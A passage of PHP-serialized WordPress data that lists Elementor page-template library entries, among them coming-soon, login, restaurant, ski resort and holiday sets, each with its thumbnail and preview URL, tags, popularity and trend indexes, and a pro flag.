shop\",\"sweets\"]\";s:10:\"menu_order\";s:3:\"143\";s:16:\"popularity_index\";s:2:\"44\";s:11:\"trend_index\";s:2:\"78\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:573;a:14:{s:2:\"id\";s:4:\"1051\";s:5:\"title\";s:24:\"Blog Post &#8211; Launch\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2017/03/post-cloud.png\";s:12:\"tmpl_created\";s:10:\"1488810869\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/blog-post-launch/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:210:\"[\"Agency\",\"bootstrap\",\"business\",\"corporate\",\"Landing Page\",\"launch\",\"marketing campaign\",\"marketing landing page\",\"marketing template landing page\",\"product launch\",\"software\",\"Startup\",\"startup landing page\"]\";s:10:\"menu_order\";s:3:\"144\";s:16:\"popularity_index\";s:2:\"17\";s:11:\"trend_index\";s:2:\"14\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:574;a:14:{s:2:\"id\";s:4:\"1245\";s:5:\"title\";s:13:\"Coming Soon 1\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2017/03/Coming-Soon-1.png\";s:12:\"tmpl_created\";s:10:\"1491207184\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/coming-soon-1/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"145\";s:16:\"popularity_index\";s:3:\"245\";s:11:\"trend_index\";s:3:\"355\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:575;a:14:{s:2:\"id\";s:4:\"1247\";s:5:\"title\";s:13:\"Coming Soon 2\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2017/03/Coming-Soon-2.png\";s:12:\"tmpl_created\";s:10:\"1491207138\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/coming-soon-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"146\";s:16:\"popularity_index\";s:2:\"27\";s:11:\"trend_index\";s:2:\"39\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:576;a:14:{s:2:\"id\";s:4:\"1248\";s:5:\"title\";s:13:\"Coming Soon 3\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2017/03/Coming-Soon-3.png\";s:12:\"tmpl_created\";s:10:\"1491207050\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/coming-soon-3/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"147\";s:16:\"popularity_index\";s:3:\"351\";s:11:\"trend_index\";s:3:\"412\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:577;a:14:{s:2:\"id\";s:4:\"1249\";s:5:\"title\";s:13:\"Coming Soon 4\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2017/03/Coming-Soon-4.png\";s:12:\"tmpl_created\";s:10:\"1491207380\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/coming-soon-4/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"148\";s:16:\"popularity_index\";s:3:\"379\";s:11:\"trend_index\";s:3:\"512\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:578;a:14:{s:2:\"id\";s:4:\"1250\";s:5:\"title\";s:13:\"Coming Soon 5\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2017/03/Coming-Soon-5.png\";s:12:\"tmpl_created\";s:10:\"1491207450\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/coming-soon-5/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"149\";s:16:\"popularity_index\";s:2:\"59\";s:11:\"trend_index\";s:2:\"76\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:579;a:14:{s:2:\"id\";s:4:\"1260\";s:5:\"title\";s:18:\"Maintenance Mode 1\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2017/03/Coming-Soon-6.png\";s:12:\"tmpl_created\";s:10:\"1491207507\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:108:\"https://library.elementor.com/maintenance-mode-1/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"150\";s:16:\"popularity_index\";s:3:\"384\";s:11:\"trend_index\";s:3:\"547\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:580;a:14:{s:2:\"id\";s:4:\"1261\";s:5:\"title\";s:18:\"Maintenance Mode 2\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2017/04/Coming-Soon-7.png\";s:12:\"tmpl_created\";s:10:\"1491207584\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:108:\"https://library.elementor.com/maintenance-mode-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"151\";s:16:\"popularity_index\";s:2:\"57\";s:11:\"trend_index\";s:3:\"130\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:581;a:14:{s:2:\"id\";s:4:\"1272\";s:5:\"title\";s:13:\"Coming Soon 8\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2017/03/Coming-Soon-8.png\";s:12:\"tmpl_created\";s:10:\"1491207674\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/coming-soon-8/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"152\";s:16:\"popularity_index\";s:3:\"260\";s:11:\"trend_index\";s:3:\"348\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:582;a:14:{s:2:\"id\";s:4:\"1279\";s:5:\"title\";s:13:\"Coming Soon 9\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2017/03/Coming-Soon-9.png\";s:12:\"tmpl_created\";s:10:\"1491207756\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/coming-soon-9/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"153\";s:16:\"popularity_index\";s:3:\"117\";s:11:\"trend_index\";s:3:\"179\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:583;a:14:{s:2:\"id\";s:4:\"1745\";s:5:\"title\";s:14:\"Coming Soon 10\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2017/05/login-002.png\";s:12:\"tmpl_created\";s:10:\"1494849745\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/coming-soon-10/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"154\";s:16:\"popularity_index\";s:3:\"251\";s:11:\"trend_index\";s:3:\"283\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:584;a:14:{s:2:\"id\";s:4:\"1742\";s:5:\"title\";s:12:\"Login Page 1\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2017/05/login-003.png\";s:12:\"tmpl_created\";s:10:\"1494849744\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:100:\"https://library.elementor.com/login-page/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"155\";s:16:\"popularity_index\";s:3:\"373\";s:11:\"trend_index\";s:3:\"408\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:585;a:14:{s:2:\"id\";s:4:\"1748\";s:5:\"title\";s:12:\"Login Page 2\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2017/05/login-001.png\";s:12:\"tmpl_created\";s:10:\"1494849742\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:102:\"https://library.elementor.com/login-page-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"156\";s:16:\"popularity_index\";s:3:\"271\";s:11:\"trend_index\";s:3:\"346\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:586;a:14:{s:2:\"id\";s:4:\"3963\";s:5:\"title\";s:32:\"Restaurant Site &#8211; Homepage\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/01/R.HomepageThumb.png\";s:12:\"tmpl_created\";s:10:\"1516284821\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/restaurant-site-homepage/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:109:\"[\"bar\",\"cafe\",\"cooking\",\"drink\",\"events\",\"fast food\",\"Food\",\"menu\",\"modern\",\"reservation\",\"Shop\",\"snack bar\"]\";s:10:\"menu_order\";s:3:\"157\";s:16:\"popularity_index\";s:3:\"230\";s:11:\"trend_index\";s:3:\"326\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:587;a:14:{s:2:\"id\";s:4:\"3969\";s:5:\"title\";s:28:\"Restaurant Site &#8211; Menu\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/01/R.MenuThumb.png\";s:12:\"tmpl_created\";s:10:\"1516284829\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:110:\"https://library.elementor.com/restaurant-site-menu/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:109:\"[\"bar\",\"cafe\",\"cooking\",\"drink\",\"events\",\"fast food\",\"Food\",\"menu\",\"modern\",\"reservation\",\"Shop\",\"snack bar\"]\";s:10:\"menu_order\";s:3:\"158\";s:16:\"popularity_index\";s:3:\"365\";s:11:\"trend_index\";s:3:\"457\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:588;a:14:{s:2:\"id\";s:4:\"3966\";s:5:\"title\";s:29:\"Restaurant Site &#8211; About\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/01/R.AboutThumb.png.png\";s:12:\"tmpl_created\";s:10:\"1516284839\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/restaurant-site-about/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:109:\"[\"bar\",\"cafe\",\"cooking\",\"drink\",\"events\",\"fast food\",\"Food\",\"menu\",\"modern\",\"reservation\",\"Shop\",\"snack bar\"]\";s:10:\"menu_order\";s:3:\"159\";s:16:\"popularity_index\";s:3:\"235\";s:11:\"trend_index\";s:3:\"245\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:589;a:14:{s:2:\"id\";s:4:\"3972\";s:5:\"title\";s:31:\"Restaurant Site &#8211; Contact\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2018/01/R.ContactThumb.png\";s:12:\"tmpl_created\";s:10:\"1516284847\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/restaurant-site-contact/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:109:\"[\"bar\",\"cafe\",\"cooking\",\"drink\",\"events\",\"fast food\",\"Food\",\"menu\",\"modern\",\"reservation\",\"Shop\",\"snack bar\"]\";s:10:\"menu_order\";s:3:\"160\";s:16:\"popularity_index\";s:3:\"332\";s:11:\"trend_index\";s:3:\"497\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:590;a:14:{s:2:\"id\";s:4:\"2080\";s:5:\"title\";s:27:\"Ski Resort &#8211; Homepage\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2017/10/Ski-Resort-Home-Page.png\";s:12:\"tmpl_created\";s:10:\"1508161124\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:109:\"https://library.elementor.com/ski-resort-homepage/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"161\";s:16:\"popularity_index\";s:3:\"296\";s:11:\"trend_index\";s:3:\"315\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:591;a:14:{s:2:\"id\";s:4:\"2088\";s:5:\"title\";s:24:\"Ski Resort &#8211; About\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2017/10/Ski-Resort-About.png\";s:12:\"tmpl_created\";s:10:\"1508161129\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/ski-resort-about/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"162\";s:16:\"popularity_index\";s:3:\"367\";s:11:\"trend_index\";s:3:\"463\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:592;a:14:{s:2:\"id\";s:4:\"2085\";s:5:\"title\";s:27:\"Ski Resort &#8211; Services\";s:9:\"thumbnail\";s:80:\"https://library.elementor.com/wp-content/uploads/2017/10/Ski-Resort-Services.png\";s:12:\"tmpl_created\";s:10:\"1508161134\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:109:\"https://library.elementor.com/ski-resort-services/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"163\";s:16:\"popularity_index\";s:3:\"441\";s:11:\"trend_index\";s:3:\"587\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:593;a:14:{s:2:\"id\";s:4:\"2462\";s:5:\"title\";s:23:\"Architect &#8211; About\";s:9:\"thumbnail\";s:80:\"https://library.elementor.com/wp-content/uploads/2017/10/architect-â€“-about.png\";s:12:\"tmpl_created\";s:10:\"1508243317\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:105:\"https://library.elementor.com/architect-about/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"164\";s:16:\"popularity_index\";s:3:\"291\";s:11:\"trend_index\";s:3:\"368\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:594;a:14:{s:2:\"id\";s:4:\"2362\";s:5:\"title\";s:26:\"Architect &#8211; Projects\";s:9:\"thumbnail\";s:79:\"https://library.elementor.com/wp-content/uploads/2017/10/Architect-Projects.png\";s:12:\"tmpl_created\";s:10:\"1508243335\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:108:\"https://library.elementor.com/architect-projects/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"165\";s:16:\"popularity_index\";s:3:\"358\";s:11:\"trend_index\";s:3:\"561\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:595;a:14:{s:2:\"id\";s:3:\"614\";s:5:\"title\";s:25:\"Architect &#8211; Contact\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2016/12/architect-contact.jpg\";s:12:\"tmpl_created\";s:10:\"1481549169\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/architect-contact/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"166\";s:16:\"popularity_index\";s:3:\"254\";s:11:\"trend_index\";s:3:\"437\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:596;a:14:{s:2:\"id\";s:4:\"2126\";s:5:\"title\";s:37:\"Construction Company &#8211; Homepage\";s:9:\"thumbnail\";s:91:\"https://library.elementor.com/wp-content/uploads/2017/10/Construction-Company-Home-Page.png\";s:12:\"tmpl_created\";s:10:\"1508325849\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/construction-company-homepage/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"167\";s:16:\"popularity_index\";s:3:\"262\";s:11:\"trend_index\";s:3:\"234\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:597;a:14:{s:2:\"id\";s:4:\"2129\";s:5:\"title\";s:34:\"Construction Company &#8211; About\";s:9:\"thumbnail\";s:87:\"https://library.elementor.com/wp-content/uploads/2017/10/Construction-Company-About.png\";s:12:\"tmpl_created\";s:10:\"1508325881\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/construction-company-about/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"168\";s:16:\"popularity_index\";s:3:\"280\";s:11:\"trend_index\";s:3:\"340\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:598;a:14:{s:2:\"id\";s:4:\"2135\";s:5:\"title\";s:36:\"Construction Company &#8211; Contact\";s:9:\"thumbnail\";s:89:\"https://library.elementor.com/wp-content/uploads/2017/10/Construction-Company-Contact.png\";s:12:\"tmpl_created\";s:10:\"1508325922\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/construction-company-contact/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"169\";s:16:\"popularity_index\";s:3:\"307\";s:11:\"trend_index\";s:3:\"309\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:599;a:14:{s:2:\"id\";s:4:\"2094\";s:5:\"title\";s:28:\"Plants Shop &#8211; Homepage\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2017/11/Plants-Shop-Home.png\";s:12:\"tmpl_created\";s:10:\"1509621053\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:110:\"https://library.elementor.com/plants-shop-homepage/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"170\";s:16:\"popularity_index\";s:3:\"263\";s:11:\"trend_index\";s:3:\"250\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:600;a:14:{s:2:\"id\";s:4:\"2120\";s:5:\"title\";s:25:\"Plants Shop &#8211; About\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2017/11/Plants-Shop-About.png\";s:12:\"tmpl_created\";s:10:\"1509631820\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/plants-shop-about/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"171\";s:16:\"popularity_index\";s:3:\"313\";s:11:\"trend_index\";s:3:\"393\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:601;a:14:{s:2:\"id\";s:4:\"3153\";s:5:\"title\";s:14:\"Halloween Pack\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2017/10/halloween.png\";s:12:\"tmpl_created\";s:10:\"1508950132\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/halloween-pack/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"172\";s:16:\"popularity_index\";s:3:\"482\";s:11:\"trend_index\";s:3:\"536\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:602;a:14:{s:2:\"id\";s:4:\"3338\";s:5:\"title\";s:31:\"Black Friday &#8211; Nature Set\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2017/11/black-friday-1.png\";s:12:\"tmpl_created\";s:10:\"1511203351\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/black-friday-nature-set/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"173\";s:16:\"popularity_index\";s:3:\"425\";s:11:\"trend_index\";s:3:\"531\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:603;a:14:{s:2:\"id\";s:4:\"3339\";s:5:\"title\";s:35:\"Black Friday &#8211; Pop-Styled Set\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2017/11/black-friday-2.png\";s:12:\"tmpl_created\";s:10:\"1511203636\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/black-friday-pop-styled-set/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"174\";s:16:\"popularity_index\";s:3:\"403\";s:11:\"trend_index\";s:3:\"449\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:604;a:14:{s:2:\"id\";s:4:\"3335\";s:5:\"title\";s:31:\"Black Friday &#8211; Retail Set\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2017/11/black-friday-4.png\";s:12:\"tmpl_created\";s:10:\"1511203246\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/black-friday-retail-set/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"175\";s:16:\"popularity_index\";s:3:\"400\";s:11:\"trend_index\";s:3:\"486\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:605;a:14:{s:2:\"id\";s:4:\"3340\";s:5:\"title\";s:41:\"Black Friday &#8211; Software Product Set\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2017/11/black-friday-3.png\";s:12:\"tmpl_created\";s:10:\"1511203713\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:123:\"https://library.elementor.com/black-friday-software-product-set/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"176\";s:16:\"popularity_index\";s:3:\"386\";s:11:\"trend_index\";s:3:\"307\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:606;a:14:{s:2:\"id\";s:4:\"3517\";s:5:\"title\";s:27:\"Christmas &#8211; Gift Shop\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2017/12/XmasThumb.png\";s:12:\"tmpl_created\";s:10:\"1513877937\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:109:\"https://library.elementor.com/christmas-gift-shop/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"177\";s:16:\"popularity_index\";s:3:\"446\";s:11:\"trend_index\";s:3:\"454\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:607;a:14:{s:2:\"id\";s:4:\"3734\";s:5:\"title\";s:28:\"Christmas &#8211; Car Agency\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2017/12/cover-lib-v3.png\";s:12:\"tmpl_created\";s:10:\"1514197794\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:110:\"https://library.elementor.com/christmas-car-agency/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"178\";s:16:\"popularity_index\";s:3:\"422\";s:11:\"trend_index\";s:3:\"565\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:608;a:14:{s:2:\"id\";s:4:\"3764\";s:5:\"title\";s:33:\"Christmas &#8211; Interior Design\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2017/12/cover-lib-v6.png\";s:12:\"tmpl_created\";s:10:\"1514198234\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/christmas-interior-design/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"179\";s:16:\"popularity_index\";s:3:\"407\";s:11:\"trend_index\";s:3:\"527\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:609;a:14:{s:2:\"id\";s:4:\"3565\";s:5:\"title\";s:27:\"Christmas &#8211; Tree 